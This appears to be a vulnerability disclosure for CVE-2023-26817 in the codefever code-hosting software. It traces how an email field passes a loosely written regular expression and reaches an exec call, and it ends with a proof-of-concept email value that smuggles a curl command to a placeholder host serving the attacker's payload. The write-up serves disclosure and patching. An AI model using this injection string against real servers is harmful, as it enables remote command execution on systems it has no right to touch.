Headline
CVE-2023-26817: The Codefeve before 2023.2.7-b1c2e7f has a Remote Command Execute Vulnerability · Issue #140 · PGYER/codefever
codefever before 2023.2.7-commit-b1c2e7f was discovered to contain a remote code execution (RCE) vulnerability via the component /controllers/api/user.php.
List of Vulnerable path
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email is from Request::parse().
Lines 44-56 of the “Request.php” show us that we can input any data.
Lines 294-295 of the “user.php” use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function “exec” to Remote Code Execute.
Vulnerability exploitation process:
Register and login.
Input the POC.
We can check ‘result.txt’ and decode it.
POC code:
[email protected]’xx|curl test.server.com;xx’xx
Your exp should be in test.server.com.We can execute any remote command.